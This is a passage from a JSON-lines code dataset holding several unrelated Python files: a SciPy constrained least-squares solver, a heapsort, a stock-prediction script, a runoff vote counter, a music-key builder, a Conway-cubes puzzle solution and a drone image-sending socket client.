atleast_2d(_asarray_validated(E, check_finite=True))\r\n f = atleast_1d(_asarray_validated(f, check_finite=True))\r\n EE = E.copy()\r\n ff = f.copy()\r\n m, n = EE.shape\r\n for i in range(0, m):\r\n # determine new best row and put it next\r\n if i == 0:\r\n imax = find_max_sense(EE, ff)\r\n else:\r\n rnmax = -1.0\r\n imax = -1\r\n for k in range(i, m):\r\n rn = mynorm(EE[k, :])\r\n if rn > rnmax:\r\n rnmax = rn\r\n imax = k\r\n EE[[i, imax], :] = EE[[imax, i], :]\r\n ff[[i, imax]] = ff[[imax, i]]\r\n\r\n # normalize\r\n rin = mynorm(EE[i, :])\r\n if rin > 0.0:\r\n EE[i, :] /= rin\r\n ff[i] /= rin\r\n else:\r\n ff[i] = 0.0\r\n\r\n # subtract projections onto EE[i,:]\r\n for k in range(i + 1, m):\r\n d = np.dot(EE[k, :], EE[i, :])\r\n EE[k, :] -= d * EE[i, :]\r\n ff[k] -= d * ff[i]\r\n\r\n # reject ill-conditioned rows\r\n if m > 2:\r\n g = np.zeros(m)\r\n for k in range(0, m):\r\n g[k] = abs(ff[k])\r\n m1 = splita(g, m)\r\n mm = splitb(g, m1)\r\n if mm < m:\r\n EE = np.resize(EE, (mm, n))\r\n ff = np.resize(ff, mm)\r\n return EE, ff\r\n\r\n\r\ndef arlseq(A, b, E, f):\r\n \"\"\"Solves the double linear system of equations\r\n\r\n Ax = b (least squares)\r\n Ex = f (exact)\r\n\r\n Both Ax=b and Ex=f system can be underdetermined, square,\r\n or over-determined. Arguments b and f must be single columns.\r\n\r\n Ex=f is treated as a set of equality constraints.\r\n These constraints are usually few in number and well behaved.\r\n But clearly the caller can easily provide equations in Ex=f that\r\n are impossible to satisfy as a group. For example, there could be\r\n one equation requiring x[0]=0, and another requiring x[0]=1.\r\n And, the solver must deal with there being redundant or other\r\n pathological situations within the E matrix.\r\n So the solution process will either solve each equation in Ex=f exactly\r\n (within roundoff) or if that is impossible, arlseq() will discard\r\n one or more equations until the remaining equations are solvable\r\n exactly (within roundoff).\r\n We will refer below to the solution of this reduced system as \"xe\".\r\n\r\n After Ex=f is processed as above, the rows of Ax=b will have their\r\n projections onto every row of Ex=f subtracted from them.\r\n We will call this reduced set of equations A'x = b'.\r\n (Thus, the rows of A' will all be orthogonal to the rows of E.)\r\n This reduced problem A'x = b', will then be solved with arls().\r\n We will refer to the solution of this system as \"xt\".\r\n\r\n The final solution will be x = xe + xt.\r\n (Since E and A' are mutually orthogonal matrices.)\r\n\r\n If A'x = b' is NOT ill-conditioned (or singular) then x = xe + xt\r\n will satisfy all the equality constraints that were not rejected.\r\n However, if A'x = b' is ill-conditioned, then xt will be a regularized\r\n solution, not an exact solution, and thus x = xe + xt will not in general\r\n satisfy the equality constraints exactly.\r\n\r\n Parameters\r\n ----------\r\n A : (m, n) array_like \"Coefficient\" matrix, type float.\r\n b : (m) array_like column of dependent variables, type float.\r\n E : (me, n) array_like \"Coefficient\" matrix, type float.\r\n f : (me) array_like column of dependent variables, type float.\r\n\r\n Returns\r\n -------\r\n x : (n) array_like column, type float.\r\n nr : int\r\n The numerical rank of the matrix, A, after its projection onto the rows\r\n of E are subtracted.\r\n ur : int\r\n The \"usable\" rank of the \"reduced\" problem, Ax=b, after its projection\r\n onto the rows of Ex=f are subtracted.\r\n Note that \"numerical rank\" is an attribute of a matrix\r\n but the \"usable rank\" that arls computes is an attribute\r\n of the problem, Ax=b.\r\n sigma : float\r\n The estimated right-hand-side root-mean-square error.\r\n lambda : float\r\n The estimated Tikhonov regularization.\r\n\r\n Raises\r\n ------\r\n LinAlgError\r\n If A is not 2-D.\r\n If A is empty.\r\n If A and b do not have the same row size.\r\n If b has more than one column.\r\n If E is not 2-D.\r\n If E is empty.\r\n If E and f do not have the same row size.\r\n If f has more than one column.\r\n If A and E do not have the same number of columns.\r\n If SCIPY's SVD() does not converge.\r\n\r\n Examples\r\n --------\r\n Here is a tiny example of a problem which has an \"unknown\" amount\r\n of error in the right hand side, but for which the user knows that the\r\n correct SUM of the unknowns must be 3:\r\n\r\n x + 2 y = 5.3 (Least Squares)\r\n 2 x + 3 y = 7.8\r\n x + y = 3 ( Exact )\r\n\r\n Then the arrays for arlseq are:\r\n\r\n A = array([[ 1., 2.0],\r\n [ 2., 3.0]])\r\n b = array([5.3, 7.8])\r\n E = array([[ 1.0, 1.0]])\r\n f = array([3.0])\r\n\r\n Without using the equality constraint we are given here,\r\n standard solvers will return [x,y] = [-.3 , 2.8].\r\n Even arls() will return the same [x,y] = [-.3 , 2.8].\r\n The residual for this solution is [0.0 , 0.0] (within roundoff).\r\n But of course x + y = 2.5, not the 3.0 we really want.\r\n\r\n Arlsnn() could help here by disallowing presumably unacceptable\r\n negative values, producing [x,y] = [0. , 2.6].\r\n The residual for this solution is [-0.1 , 0.] which is of course\r\n an increase from zero, but this is natural since we have forced\r\n the solution away from being the \"exact\" result, for good reason.\r\n Note that x + y = 2.6, which is a little better.\r\n\r\n If we solve with arlseq(A,b,E,f) then we get [x,y] = [1.004, 1.996].\r\n This answer is close to the \"correct\" answer of [x,y] = [1.0 , 2.0]\r\n if the right hand side had been the correct [5.,8.] instead of [5.3,7.8].\r\n The residual for this solution is [-0.3 , 0.2] which is yet larger.\r\n Again, when adding constraints to the problem the residual\r\n typically increases, but the solution becomes more acceptable.\r\n Note that x + y = 3 exactly.\r\n\r\n Notes:\r\n -----\r\n See arls() above for notes and references.\r\n \"\"\"\r\n A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n AA = A.copy()\r\n bb = b.copy()\r\n checkAb(AA, bb, 1)\r\n m, n = AA.shape\r\n rnmax = find_max_row_norm(AA)\r\n neglect = rnmax * 0.00000001 # see Note 6. for arls()\r\n\r\n E = atleast_2d(_asarray_validated(E, check_finite=True))\r\n f = atleast_1d(_asarray_validated(f, check_finite=True))\r\n EE = E.copy()\r\n ff = f.copy()\r\n checkAb(EE, ff, 1)\r\n me, ne = EE.shape\r\n\r\n if n != ne:\r\n raise LinAlgError(\r\n \"The two matrices do not have the same number of unknowns.\")\r\n\r\n EE, ff = prepeq(EE, ff, neglect)\r\n mEE = EE.shape[0]\r\n\r\n # decouple AAx=bb from EEx=ff\r\n i = 0\r\n while i < m:\r\n for j in range(0, mEE):\r\n d = np.dot(AA[i, :], EE[j, :])\r\n AA[i, :] -= d * EE[j, :]\r\n bb[i] -= d * ff[j]\r\n nm = mynorm(AA[i, :])\r\n if nm < neglect:\r\n AA = np.delete(AA, i, 0)\r\n bb = np.delete(bb, i, 0)\r\n m = AA.shape[0]\r\n else:\r\n AA[i, :] = AA[i, :] / nm\r\n bb[i] = bb[i] / nm\r\n i += 1\r\n\r\n # final solution\r\n xe = np.transpose(EE) @ ff\r\n if AA.shape[0] > 0:\r\n xt, nr, ur, sigma, lambdah = arls(AA, bb)\r\n return xt + xe, nr, ur, sigma, lambdah\r\n else:\r\n return xe, 0, 0, 0., 0.\r\n\r\n\r\ndef arlsgt(A, b, G, h):\r\n \"\"\"Solves the double linear system of equations\r\n Ax = b (least squares)\r\n Gx >= h (\"greater than\" inequality constraints)\r\n Both Ax=b and Gx>=h can be underdetermined, square, or over-determined.\r\n Arguments b and h must be single columns.\r\n Arlsgt() uses arls(), above, as the core solver, and iteratively selects\r\n rows of Gx>=h to move to a growing list of equality constraints, choosing\r\n first whatever equation in Gx>=h most violates its requirement.\r\n\r\n Note that \"less than\" equations can be included by negating\r\n both sides of the equation, thus turning it into a \"greater than\".\r\n\r\n If either A or b is all zeros then the solution will be all zeros.\r\n\r\n Parameters\r\n ----------\r\n A : (m, n) array_like \"Coefficient\" matrix, type float.\r\n b : (m) array_like column of dependent variables, type float.\r\n G : (mg, n) array_like \"Coefficient\" matrix, type float.\r\n b : (mg) array_like column of dependent variables, type float.\r\n\r\n Returns\r\n -------\r\n x : (n) array_like column, type float.\r\n nr : int\r\n The numerical rank of the matrix, A.\r\n ur : int\r\n The usable rank of the problem, Ax=b.\r\n Note that \"numerical rank\" is an attribute of a matrix\r\n but the \"usable rank\" that arls computes is an attribute\r\n of the problem, Ax=b.\r\n sigma : float\r\n The estimated right-hand-side root-mean-square error.\r\n lambda : float\r\n The estimated Tikhonov regularization.\r\n\r\n Raises\r\n ------\r\n LinAlgError\r\n If A is not 2-D.\r\n If A is empty.\r\n If A and b do not have the same row size.\r\n If b has more than one column.\r\n If G is not 2-D.\r\n If G is empty.\r\n If G and h do not have the same row size.\r\n If h has more than one column.\r\n If A and G do not have the same number of columns.\r\n If SCIPY's SVD() does not converge.\r\n\r\n Example\r\n -------\r\n Let A = [[1,1,1],\r\n [0,1,1],\r\n [1,0,1]]\r\n and b = [5.9, 5.0, 3.9]\r\n\r\n Then any least-squares solver would produce x = [0.9, 2., 3.]\r\n The residual for this solution is zero within roungoff.\r\n\r\n But if we happen to know that all the answers should be at least 1.0\r\n then we can add inequalites to insure that:\r\n x[0] >= 1\r\n x[1] >= 1\r\n x[2] >= 1\r\n\r\n This can be expressed in the matrix equation Gx>=h where\r\n G = [[1,0,0],\r\n [0,1,0],\r\n [0,0,1]]\r\n h = [1,1,1]\r\n\r\n Then arlsgt(A,b,G,h) produces x = [1., 2.05, 2.9].\r\n The residual vector and its norm are then:\r\n res = [-0.05, 0.05, 0.0]\r\n norm(res) = 0.0707\r\n\r\n If the user had just adjusted the least-squares answer of [0.9, 2., 3.]\r\n to [1., 2., 3.] without re-solving then the residual vector\r\n and its norm would be\r\n res = [0.1, 0, 0.1]\r\n norm(res) = 0.141\r\n which is significantly larger.\r\n \"\"\"\r\n A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n checkAb(A, b, 1)\r\n m, n = A.shape\r\n\r\n G = atleast_2d(_asarray_validated(G, check_finite=True))\r\n h = atleast_1d(_asarray_validated(h, check_finite=True))\r\n GG = G.copy()\r\n hh = h.copy()\r\n checkAb(GG, hh, 1)\r\n mg, ng = GG.shape\r\n if n != ng:\r\n raise LinAlgError(\r\n \"The two matrices do not have the same number of unknowns.\")\r\n\r\n EE = []\r\n ff = []\r\n me = 0\r\n ne = 0\r\n\r\n # get initial solution... it might actually be right\r\n x, nr, ur, sigma, lambdah = arls(A, b)\r\n nx = mynorm(x)\r\n if nx <= 0.0:\r\n return np.zeros(n), 0, 0, 0., 0.\r\n\r\n # while constraints are not fully satisfied:\r\n while True:\r\n # assess state of inequalities\r\n p = -1\r\n mg = GG.shape[0]\r\n rhs = GG @ x\r\n worst = 0.0\r\n for i in range(0, mg):\r\n if rhs[i] < hh[i]:\r\n diff = hh[i] - rhs[i]\r\n if p < 0 or diff > worst:\r\n p = i\r\n worst = diff\r\n if p < 0:\r\n break\r\n\r\n # delete row from GGx=hh\r\n row = GG[p, :]\r\n rhsp = hh[p]\r\n GG = np.delete(GG, p, 0)\r\n hh = np.delete(hh, p, 0)\r\n\r\n # add row to Ex>=f\r\n if me == 0:\r\n EE = np.zeros((1, ng))\r\n EE[0, :] = row\r\n ff = np.zeros(1)\r\n ff[0] = rhsp\r\n me = 1\r\n ne = ng\r\n else:\r\n me += 1\r\n EE = np.resize(EE, (me, ne))\r\n EE[me - 1, :] = row[:]\r\n ff = np.resize(ff, me)\r\n ff[me - 1] = rhsp\r\n # re-solve modified system\r\n x = arlseq(A, b, EE, ff)[0]\r\n return x, nr, ur, sigma, lambdah\r\n\r\n\r\ndef arlsnn(A, b):\r\n \"\"\"Solves Ax = b in the least squares sense, with the solution\r\n constrained to be non-negative.\r\n\r\n For a nonpositive solution, use\r\n x = -arlsnn(A,-b)\r\n\r\n Parameters\r\n ----------\r\n A : (m, n) array_like \"Coefficient\" matrix, type float.\r\n b : (m) array_like column of dependent variables, type float.\r\n\r\n Returns\r\n -------\r\n x : (n) array_like column, type float.\r\n nr : int\r\n The numerical rank of the matrix, A.\r\n ur : int\r\n The usable rank of the problem, Ax=b.\r\n Note that \"numerical rank\" is an attribute of a matrix\r\n but the \"usable rank\" that arls computes is an attribute\r\n of the problem, Ax=b.\r\n sigma : float\r\n The estimated right-hand-side root-mean-square error.\r\n lambda : float\r\n The estimated Tikhonov regularization.\r\n\r\n Raises\r\n ------\r\n LinAlgError\r\n If A is not 2-D.\r\n If A is empty.\r\n If A and b do not have the same row size.\r\n If b has more than one column.\r\n If SCIPY's SVD() does not converge.\r\n\r\n Example\r\n -------\r\n Let A = [[2., 2., 1.],\r\n [2., 1., 0.],\r\n [1., 1., 0.]]\r\n and b = [3.9, 3., 2.]\r\n Then any least-squares solver will produce\r\n x = [1. ,1., -0.1]\r\n But arlsnn() produces x = [ 1.0322, 0.9093, 0.].\r\n\r\n Arlsnn() tries to produce a small residual for the final solution,\r\n while being based toward making the fewest changes feasible\r\n to the problem. Most older solvers try to minimize the residual\r\n at the expense of extra interference with the user's model.\r\n Arls, arlsgt, and arlsnn seek a better balance.\r\n \"\"\"\r\n A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n checkAb(A, b, 1)\r\n n = A.shape[1]\r\n G = np.eye(n)\r\n h = np.zeros(n)\r\n return arlsgt(A, b, G, h)\r\n","sub_path":"scipy/linalg/arls.py","file_name":"arls.py","file_ext":"py","file_size_in_byte":30672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"75991122","text":"#heapify function\ndef heapify(arr, n, i):\n largest = i # Initialize largest as root\n l = 2 * i + 1 # left = 2*i + 1\n r = 2 * i + 2 # right = 2*i + 2\n \n # See if left child of root exists and if greater than root\n if l < n and arr[1][i] < arr[1][l]:\n largest = l\n \n # See if right child of root exists and if greater than root\n if r < n and arr[1][largest] < arr[1][r]:\n largest = r\n \n # Change root, if needed\n if largest != i:\n arr[1][i],arr[1][largest] = arr[1][largest],arr[1][i] # swap output values\n arr[0][i],arr[0][largest] = arr[0][largest],arr[0][i] # swap input values\n # Heapify the root.\n heapify(arr, n, largest)\n \n#heapsort function\ndef heapSort(arr):\n n = len(arr[1])\n \n # Build a maxheap.\n # Since last parent will be at ((n//2)-1) we can start at that location.\n for i in range(n // 2 - 1, -1, -1):\n heapify(arr, n, i)\n \n # One by one extract elements\n for i in range(n-1, 0, -1):\n arr[1][i], arr[1][0] = arr[1][0], arr[1][i] # swap output values\n arr[0][i], arr[0][0] = arr[0][0], arr[0][i] # swap input values\n heapify(arr, i, 0)\n","sub_path":"BadHash40/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"118455940","text":"from sklearn.linear_model import LinearRegression #mean square error사용하는방법\nimport joblib\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport win32com.client\nimport os\nimport numpy as np\n\n\nmove_num = [5,20,60,120]\n\nobjCpCybos = win32com.client.Dispatch(\"CpUtil.CpCybos\")\nbConnect = objCpCybos.IsConnect\nif (bConnect == 0):\n print(\"PLUS가 정상적으로 연결되지 않음. \")\n exit()\n \n\n#Stock_code = ['075970','005930','052460']\n#Stock_name = [\"동국알앤에스\",\"삼성전자\",\"아이크래프트\"]\nStock_code = ['075970']\nStock_name = [\"동국알앤에스\"]\n\n\nfor x,j in enumerate(Stock_code):\n objStockChart = win32com.client.Dispatch(\"CpSysDib.StockChart\")\n objStockChart.SetInputValue(0, \"A\" + j) \n objStockChart.SetInputValue(1, ord('2')) # 개수로 조회\n objStockChart.SetInputValue(4, 25) # 하루 381개 0900 ~ 1520\n objStockChart.SetInputValue(5, [0,1,2,3,4,5,8,9]) #날짜,시간,시가,고가,저가,종가,전일대비,거래량,거래대금\n objStockChart.SetInputValue(6, ord('m')) # '차트 주가 - 일간 차트 요청\n objStockChart.SetInputValue(7, 3)\n objStockChart.SetInputValue(9, ord('1')) # 수정주가 사용\n objStockChart.BlockRequest()\n\n \n leng = objStockChart.GetHeaderValue(3)\n\n day_list = []\n time_list = []\n open_list = []\n high_list = []\n low_list = []\n close_list = []\n compare_list = []\n vol_list = []\n amount_list = []\n \n day_list.append(objStockChart.GetDataValue(0, 20))\n time_list.append(objStockChart.GetDataValue(1, 20))\n open_list.append(objStockChart.GetDataValue(2, 20))\n high_list.append(objStockChart.GetDataValue(3, 20))\n low_list.append(objStockChart.GetDataValue(4, 20))\n close_list.append(objStockChart.GetDataValue(5, 20))\n vol_list.append(objStockChart.GetDataValue(6, 20))\n amount_list.append(objStockChart.GetDataValue(7, 20))\n dict2 = {'day' : day_list, 'time' : time_list}\n dict1 = {'open' : open_list, 'high' : high_list, 'low' : low_list, \\\n 'close' : close_list,'vol' : vol_list, 'amount' : amount_list}\n\n\n df = pd.DataFrame(dict1, columns=['open','high','low','close','vol','amount'])\n df2 = pd.DataFrame(dict2, columns=['day','time'])\n df.sort_index(ascending=False)\n print(df)\n print(df2)\n\n #코스닥 조회\n\n kda_open,kda_high,kda_low,kda_close,kda_vol,kda_close_move,kda_vol_move,price_moving_tmp, vol_moving_tmp = [],[],[],[],[],[],[],[],[]\n\n objStockChart.SetInputValue(0, 'U201') \n objStockChart.SetInputValue(1, ord('2')) # 개수로 조회\n objStockChart.SetInputValue(4, 120) # 하루 381개 0900 ~ 1520\n objStockChart.SetInputValue(5, [0,1,2,3,4,5,8,9]) #날짜,시간,시가,고가,저가,종가,전일대비,거래량,거래대금\n objStockChart.SetInputValue(6, ord('m')) # '차트 주가 - 일간 차트 요청\n objStockChart.SetInputValue(7, 3)\n objStockChart.SetInputValue(9, ord('1')) # 수정주가 사용\n objStockChart.BlockRequest()\n\n \n kda_open.append(objStockChart.GetDataValue(2, 0))\n kda_high.append(objStockChart.GetDataValue(3, 0))\n kda_low.append(objStockChart.GetDataValue(4, 0))\n kda_close.append(objStockChart.GetDataValue(5, 20))\n kda_vol.append(objStockChart.GetDataValue(6, 20)/1000)\n\n for j in move_num:\n for i in range(j):\n kda_close_move.append(objStockChart.GetDataValue(5, i))\n kda_vol_move.append(objStockChart.GetDataValue(6, i)/1000)\n\n kda_close_numpy = np.array(kda_close_move)\n kda_vol_numpy = np.array(kda_vol_move)\n price_moving_tmp += int(np.mean(kda_close_numpy)),\n vol_moving_tmp += int(np.mean(kda_vol_numpy)),\n \n kda_close_move, kda_vol_move= [], []\n\n # feature_list = ['price_5_moving','price_20_moving','price_60_moving','price_120_moving','amount_5_moving','amount_20_moving','amount_60_moving','amount_120_moving']\n # tmp_list = price_moving_tmp + amount_moving_tmp\n feature_list = ['kda_vol_5_moving','kda_vol_20_moving','kda_vol_60_moving','kda_vol_120_moving']\n tmp_list = vol_moving_tmp\n\n name_list1 = ['kda_open','kda_high','kda_low','kda_close','kda_vol']\n value_list1 = [kda_open,kda_high,kda_low,kda_close,kda_vol]\n\n\n for x,i in enumerate(tmp_list):\n value_list1 += i,\n name_list1 += '{}'.format(feature_list[x]),\n\n\n #코스피 조회\n\n ksi_open,ksi_high,ksi_low,ksi_close,ksi_vol,ksi_close_move,ksi_vol_move,price_moving_tmp, vol_moving_tmp = [],[],[],[],[],[],[],[],[]\n\n objStockChart.SetInputValue(0, 'U001') \n objStockChart.SetInputValue(1, ord('2')) # 개수로 조회\n objStockChart.SetInputValue(4, 120) # 하루 381개 0900 ~ 1520\n objStockChart.SetInputValue(5, [0,1,2,3,4,5,8,9]) #날짜,시간,시가,고가,저가,종가,전일대비,거래량,거래대금\n objStockChart.SetInputValue(6, ord('m')) # '차트 주가\n objStockChart.SetInputValue(7, 3)\n objStockChart.SetInputValue(9, ord('1')) # 수정주가 사용\n objStockChart.BlockRequest()\n\n \n ksi_open.append(objStockChart.GetDataValue(2, 0))\n ksi_high.append(objStockChart.GetDataValue(3, 0))\n ksi_low.append(objStockChart.GetDataValue(4, 0))\n ksi_close.append(objStockChart.GetDataValue(5, 0))\n ksi_vol.append(objStockChart.GetDataValue(6, 0)/1000)\n\n for j in move_num:\n for i in range(j):\n ksi_close_move.append(objStockChart.GetDataValue(5, i))\n ksi_vol_move.append(objStockChart.GetDataValue(6, i)/1000)\n \n\n\n ksi_close_numpy = np.array(ksi_close_move)\n ksi_vol_numpy = np.array(ksi_vol_move)\n price_moving_tmp += int(np.mean(ksi_close_numpy)),\n vol_moving_tmp += int(np.mean(ksi_vol_numpy)),\n \n ksi_close_move, ksi_vol_move= [], []\n\n\n\n # feature_list = ['price_5_moving','price_20_moving','price_60_moving','price_120_moving','vol_5_moving','vol_20_moving','vol_60_moving','vol_120_moving']\n # tmp_list = price_moving_tmp + vol_moving_tmp\n feature_list = ['ksi_vol_5_moving','ksi_vol_20_moving','ksi_vol_60_moving','ksi_vol_120_moving']\n tmp_list = vol_moving_tmp\n\n\n name_list2 = ['ksi_open','ksi_high','ksi_low','ksi_close','ksi_vol']\n value_list2 = [ksi_open,ksi_high,ksi_low,ksi_close,ksi_vol]\n\n\n for x,i in enumerate(tmp_list):\n value_list2 += i,\n name_list2 += '{}'.format(feature_list[x]),\n\n\n #코스피 코스닥 feature 합치기 \n\n name_list = name_list1 + name_list2\n value_list = value_list1 + value_list2\n\n print(len(name_list))\n print(len(value_list))\n\n # df에 추가하기 \n\n for x,i in enumerate(value_list):\n df['{}'.format(name_list[x])] = i\n \n print(df)\n\n test_model = joblib.load('testdata.pkl')\n y_predict = test_model.predict(df)\n print(y_predict)\n\n\n\n\n# compare_data = pd.read_excel('동국알앤에스_test_Data.xlsx')\n# compare_data.drop(['compare','day','time'], axis=1, inplace=True)\n\n\n# test_model = joblib.load('testdata.pkl')\n\n# y_compare_predict = test_model.predict(compare_data.iloc[0])\n\n# print(y_compare_predict)\n","sub_path":"AutoTrade/test_deleteme.py","file_name":"test_deleteme.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"171794108","text":"# not sure what exact formula is wanted, i am going to use exaustive ballot\n\n# getting an input number that is actually an integer\ndef inputNumber(message):\n while True:\n try:\n userInput = int(input(message)) \n except ValueError:\n print(\"Not an integer! Try again.\")\n continue\n else:\n return (userInput)\n\n# getting a valid vote\ndef getValidChoice(choiceNumber,prevVotes):\n valid = False\n while valid == False:\n vote = input(\"Vote #\"+str(choiceNumber)+\": \")\n for p in candidateList:\n if vote == p:\n valid = True\n for z in prevVotes:\n if vote != z:\n pass\n else:\n print(\"You have already voted for them.\")\n valid = False\n break \n if valid == False:\n print(\"Invalid, try again\")\n return(vote)\n\n# getting the candidates into a dictionary, in which the can be scored\ncandidates = {}\nnumOfCandidates = inputNumber(\"Enter the number of candidates: \")\nfor i in range(0,numOfCandidates):\n candidate = input(\"Input name of the candidate: \")\n candidates[candidate] = 0\n\n# getting the number of voters\nnumOfVoters = inputNumber(\"Enter the number of voters: \")\nprint()\nvotes = []\n\n# get the votes\ncandidateList = list(candidates.keys())\nfor i in range(0,numOfVoters):\n votes.append([])\n for p in range(0,numOfCandidates):\n votes[i].append(getValidChoice(p+1, votes[i]))\n print()\n\nwinner = ''\nwinnerFound = False\n\nwhile True:\n\n # getting rid of all that are elim'd\n candidateList = list(candidates.keys())\n\n # setting score = to 0\n for i in range(0,len(candidates)):\n candidates[candidateList[i]] = 0\n\n # getting the top votes and setting the candidates score\n for i in range(0,len(votes)):\n candidates[votes[i][0]] += 1\n\n # seeing if someone has more than 50 percent\n for candidate in candidateList:\n if candidates[candidate] > numOfVoters / 2:\n winnerFound = True\n winner = candidate\n\n # breakcase\n if winnerFound:\n print(\"Winner:\", winner)\n break\n\n # getting the biggest loser\n losers = []\n loserScore = -1\n for i in range(0,len(candidates)):\n if loserScore == -1:\n losers = []\n losers.append(candidateList[i])\n loserScore = candidates[candidateList[i]]\n elif candidates[candidateList[i]] < loserScore:\n losers = []\n losers.append(candidateList[i])\n loserScore = candidates[candidateList[i]]\n elif candidates[candidateList[i]] == loserScore:\n losers.append(candidateList[i])\n loserScore = candidates[candidateList[i]]\n\n # deleting the biggers loser(s)\n for loser in losers:\n for i in range(0,len(votes)):\n votes[i].remove(loser)\n del candidates[loser]\n\n if len(candidates) == 0:\n print(\"It was a tie\")\n break","sub_path":"lesson-3/problem-set/runoff.py","file_name":"runoff.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"293718903","text":"#!/usr/bin/python\n\nfrom enum import Enum\n\n# each number represents the pitch for the note\n\nclass Notes(Enum):\n __order__ = 'A B C D E F G'\n A = 0;\n B = 2;\n C = 3;\n D = 5;\n E = 7;\n F = 8;\n G = 10;\n\norderedNotes = list(Notes)\n\nnotes = {\n \"A*\" : 11,\n \"A\" : 0,\n \"A#\" : 1,\n\n \"B*\" : 1,\n \"B\" : 2,\n \"B#\" : 3,\n\n \"C*\" : 2,\n \"C\" : 3,\n \"C#\" : 4,\n\n \"D*\" : 4,\n \"D\" : 5,\n \"D#\" : 6,\n\n \"E*\" : 6,\n \"E\" : 7,\n \"E#\" : 8,\n\n \"F*\" : 7,\n \"F\" : 8,\n \"F#\" : 9,\n\n \"G*\" : 9,\n \"G\" : 10,\n \"G#\" : 11\n}\n\n# going up full steps and half steps on semitones\n\ndef fullstep(pitch):\n return (pitch + 2)%12\n\ndef halfstep(pitch):\n return (pitch + 1)%12\n\n#interval patterns shown as arrays\n\nMajor = ['f','f','h','f','f','f','h']\n\n#Given a note and interval pattern, gives you all the semitones\n\ndef NotesInKey(note,KeyType):\n result = notes.get(note)\n results = [result]\n print(result)\n for x in KeyType:\n if x == 'f':\n result = fullstep(result)\n elif x == 'h':\n result = halfstep(result)\n results.append(result)\n return results\n\n\ndef getToneFromNote():\n #notesList = list(Notes)\n for i in range(0,3):\n print(notes[i])\n\nvar = NotesInKey(\"A\", Major)\n\nprint(var)\n","sub_path":"chord_builder_deluxe.py","file_name":"chord_builder_deluxe.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"412264773","text":"import sys\n\nACTIVE, INACTIVE = '#.'\n\nwith open(sys.argv[1]) as file:\n initial_state = {\n (i, j, 0, 0)\n for i, row in enumerate(file)\n for j, val in enumerate(row)\n if val == ACTIVE\n }\n\ndef neighbors(cube):\n i, j, k, h = cube\n return {\n (i+di, j+dj, k+dk, h+dh)\n for di in (-1, 0, 1)\n for dj in (-1, 0, 1)\n for dk in (-1, 0, 1)\n for dh in (-1, 0, 1)\n if di != 0 or dj != 0 or dk != 0 or dh != 0\n }\n\ndef num_active_neighbors(cube, active_cubes):\n return sum(\n neighbor in active_cubes\n for neighbor in neighbors(cube)\n )\n\nactive_cubes = initial_state.copy()\n\nfor cycle in range(6):\n inactive_cubes_of_interest = (\n set.union(*map(neighbors, active_cubes))\n - active_cubes\n )\n activated_cubes = {\n cube\n for cube in inactive_cubes_of_interest\n if num_active_neighbors(cube, active_cubes) == 3\n }\n deactivated_cubes = {\n cube\n for cube in active_cubes\n if num_active_neighbors(cube, active_cubes) not in (2, 3)\n }\n active_cubes |= activated_cubes\n active_cubes -= deactivated_cubes\n\nprint(len(active_cubes))\n\n","sub_path":"day-17/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"391309359","text":"#!/usr/bin/python\nimport socket\nimport cv2\nimport numpy\nimport json\n\n\nclass DRONE_Client:\n def __init__(self, TCP_IP=None, TCP_PORT=None):\n # 소켓 생성 및 서버에 연결\n self.TCP_IP = TCP_IP\n self.sock = socket.socket()\n self.sock.connect((self.TCP_IP, TCP_PORT))\n print('connecting')\n\n\n\n # 맵이 전체적으로 들어왔는지 확인하기\n def fullMapChecker(self, img):\n # 1st: 데모판 영역따기 - findcontour 처리해서 가장 큰 사각형 잡기 -> 기울어짐 제거 작업\n imgray = cv2.GaussianBlur(img, (5, 5), 0)\n imgray = cv2.cvtColor(imgray, cv2.COLOR_BGR2GRAY)\n canny = cv2.Canny(imgray, 100, 200)\n contours, hierarchy = cv2.findContours(canny, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n sorted_list = sorted(contours, key=lambda cc: len(cc))\n\n # 2nd: 기울어진 최대사각형 \"sorted_list[-1]\"의 면적을 토대로 적절한 맵이 들어왔나 확인 - 서버로 보낼지 판단\n maxHull = cv2.convexHull(sorted_list[-1])\n x, y, w, h = cv2.boundingRect(maxHull)\n Cx, Cy = x + w/2, y + h/2\n area = w*h\n full_area = img.shape[0]*img.shape[1]\n #print(area/full_area)\n if img.shape[1]/2 - 100 < Cx < img.shape[1]/2 + 100 and img.shape[0]/2 - 100 < Cy < img.shape[0]/2 + 100:\n if 0.45 > area / full_area > 0.447:\n cv2.drawContours(img, [maxHull], 0, (0, 1, 9), 2)\n cv2.imwrite(\"./container/{}.jpg\".format(str(area / full_area)), cv2.resize(img, (800, 600)))\n return True\n else:\n return False\n\n\n def sendToServer(self, img, lct):\n\n\n\n # 1st: 소켓통신 - 추출한 이미지를 String 형태로 변환(인코딩)\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n result, imgencode = cv2.imencode('.jpg', img, encode_param)\n data = numpy.array(imgencode)\n stringData = 